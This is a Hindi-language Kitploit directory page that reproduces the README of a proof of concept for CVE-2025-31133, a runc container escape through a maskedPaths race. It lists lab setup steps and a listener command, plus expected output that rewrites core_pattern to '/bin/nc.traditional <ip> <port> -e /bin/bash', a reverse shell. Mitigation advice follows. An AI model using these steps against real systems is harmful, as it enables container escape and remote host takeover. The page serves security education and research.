Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Learn-about-cve-2025-31133-poc — CVE-2025-31133 के लिए शैक्षिक प्रमाण-अवधारणा, जो maskedPaths रेस कंडीशन के माध्यम से runc कंटेनर एस्केप है। इसमें लैब सेटअप, एक्सप्लॉइट स्क्रिप्ट और सुरक्षा शोधकर्ताओं के लिए शमन मार्गदर्शन शामिल है। | Kitploit
उपकरण/GitHubGitHub/c-h4ck-0/learn-about-cve-2025-31133-poc
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणलर्निंग और शिक्षाकंटेनर एस्केपलैब और अभ्यास
GitHubc-h4ck-0/learn-about-cve-2025-31133-poc

Learn-about-cve-2025-31133-poc

CVE-2025-31133 के लिए शैक्षिक प्रमाण-अवधारणा, जो maskedPaths रेस कंडीशन के माध्यम से runc कंटेनर एस्केप है। इसमें लैब सेटअप, एक्सप्लॉइट स्क्रिप्ट और सुरक्षा शोधकर्ताओं के लिए शमन मार्गदर्शन शामिल है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
2365 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-31133 POC के बारे में जानें

अवलोकन

CVE-2025-31133 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट प्रदर्शन और सीखने का वातावरण, जो runc में एक सुरक्षा भेद्यता है जो maskedPaths सुरक्षा को एक रेस कंडीशन के माध्यम से बायपास करने की अनुमति देती है। maskedPaths को कंटेनरों को संवेदनशील होस्ट फाइलसिस्टम पथों तक पहुँचने से रोकने के लिए डिज़ाइन किया गया है।

https://github.com/user-attachments/assets/d7b4ea43-6cab-4ac5-bb07-08bc46479910

👉 यह रेपो ब्लैक हैट प्रशिक्षण में सिखाए गए सटीक शोध मानसिकता और तकनीकों का एक व्यावहारिक उदाहरण है:

यदि आपको यह दिलचस्प लगता है, तो यह सिर्फ हिमशैल का सिरा है।

आक्रामक कंटेनर सुरक्षा: सीमाओं को तोड़ने में एक मास्टरक्लास

📅 ब्लैक हैट यूएसए 2026 प्रशिक्षण तिथियाँ:

August 1–2

https://blackhat.com/us-26/training/schedule/index.html#offensive-container-security-a-masterclass-in-breaking-the-boundaries-50910

August 3–4

https://blackhat.com/us-26/training/schedule/index.html#offensive-container-security-a-masterclass-in-breaking-the-boundaries-509101770251750

भेद्यता विवरण

  • CVE ID: CVE-2025-31133
  • घटक: runc (कंटेनर रनटाइम)
  • हमला वेक्टर: maskedPaths हैंडलिंग में रेस कंडीशन
  • प्रभाव: कंटेनर एस्केप

यह कैसे काम करता है

एक्सप्लॉइट एक रेस कंडीशन का लाभ उठाता है जहाँ:

  1. एक कंटेनर maskedPaths के साथ कॉन्फ़िगर किया जाता है ताकि संवेदनशील फ़ाइलों (जैसे, /proc/sys/kernel/core_pattern) की सुरक्षा की जा सके।
  2. कंटेनर इनिशियलाइज़ेशन के दौरान, निम्न के बीच एक रेस कंडीशन होती है:
    • कंटेनर rootfs में एक डिवाइस नोड (/dev/null) का विलोपन
    • उस डिवाइस नोड का पुनर्निर्माण
  3. यह टाइमिंग विंडो मास्क्ड पथ सुरक्षा को बायपास करने की अनुमति देती है
  4. एक हमलावर संरक्षित फ़ाइलों में लिख सकता है जिन्हें मास्क किया जाना चाहिए

⚠️ अस्वीकरण

यह रिपॉजिटरी केवल शैक्षिक उद्देश्यों के लिए है।

  • केवल पृथक, नियंत्रित वातावरण में उपयोग करें
  • उन सिस्टमों के विरुद्ध उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है
  • लेखक इस कोड के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है
  • यह एक्सप्लॉइट सिस्टम अस्थिरता या डेटा हानि का कारण बन सकता है

पूर्वापेक्षाएँ

  • लिनक्स सिस्टम (उबंटू अनुशंसित)
  • रूट/सुडो एक्सेस
  • इंटरनेट कनेक्शन
  • कंटेनर रनटाइम और सुरक्षा की बुनियादी समझ

सेटअप

1. इस रिपॉजिटरी को क्लोन या डाउनलोड करें

root@kitploit:~
git clone https://github.com/C-h4ck-0/Learn-about-cve-2025-31133-poc.git
cd Learn-about-cve-2025-31133-poc

2. लैब सेटअप स्क्रिप्ट चलाएँ

lab-setup.sh स्क्रिप्ट निम्नलिखित करेगी:

  • निर्भरताएँ स्थापित करें
  • एक असुरक्षित runc v1.2.0 सेट करें
root@kitploit:~
chmod +x lab-setup.sh
./lab-setup.sh

3. सेटअप सत्यापित करें

जाँचें कि असुरक्षित runc संस्करण स्थापित है:

root@kitploit:~
runc --version

आपको संस्करण 1.2.0 या समान देखना चाहिए।

एक्सप्लॉइट चलाना

मूल उपयोग

  1. एक लिसनर शुरू करें अपने हमलावर मशीन पर रिवर्स शेल प्राप्त करने के लिए:
root@kitploit:~
nc -lnvp <PORT>
  1. एक्सप्लॉइट स्क्रिप्ट चलाएँ:
root@kitploit:~
chmod +x cve-2025-31133-exploit.sh
./cve-2025-31133-exploit.sh
  1. आवश्यक जानकारी प्रदान करें जब संकेत दिया जाए:
    • हमलावर आईपी पता
    • हमलावर पोर्ट (जहाँ आपका लिसनर चल रहा है)

अपेक्षित आउटपुट

सफलता पर, आपको यह देखना चाहिए:

root@kitploit:~
[*] Compiling race condition exploit binary...
[*] Starting exploit attempts...
[*] Target: /proc/sys/kernel/core_pattern
[*] Backing up /proc/sys/kernel/core_pattern...
[*] Backup created at /tmp/core_pattern.bak
[*] Current content of target:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E

====================================================
[*] Testing delay: 5 microseconds
====================================================
X..
[+] ========================================
[+] SUCCESS! Exploit succeeded.
[+] ========================================
[+] Original content:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E
------------------------------------------------
[+] Modified content:
|/bin/nc.traditional <ip-address> <port> -e /bin/bash
------------------------------------------------
./exploit.sh: line 148:  7068 Segmentation fault      (core dumped) sleep 5
[*] Restoring original content...
[*] Restoration complete.

आपके लिसनर से एक रिवर्स शेल कनेक्शन स्थापित होना चाहिए।

शमन

इस भेद्यता से बचाव के लिए:

  1. runc को पैच किए गए संस्करण (v1.2.1 या बाद का) में अपडेट करें
  2. कंटेनर रनटाइम को नियमित रूप से अपडेट रखें
  3. न्यूनतम विशेषाधिकार सिद्धांतों का उपयोग करें - कंटेनरों को गैर-रूट उपयोगकर्ता नेमस्पेस में चलाएँ

संदर्भ

  • मेलिंग आर्काइव
  • भेद्यता पीओसी गिटहब रिपॉजिटरी

नोट्स

  • रेस कंडीशन प्रकृति के कारण एक्सप्लॉइट को सफल होने के लिए कई प्रयासों की आवश्यकता हो सकती है
  • सफलता दर सिस्टम लोड और टाइमिंग पर निर्भर करती है
  • सफल शोषण के बाद स्क्रिप्ट स्वचालित रूप से मूल core_pattern को पुनर्स्थापित करती है
  • सफाई ट्रैप हैंडलर के माध्यम से स्वचालित रूप से संभाली जाती है

लाइसेंस

यह परियोजना शैक्षिक उद्देश्यों के लिए प्रदान की गई है। जिम्मेदारी और नैतिकता से उपयोग करें।


याद रखें: सुरक्षा अनुसंधान उपकरणों का हमेशा जिम्मेदारी से और केवल उन वातावरणों में उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है।

टूल डाउनलोड करें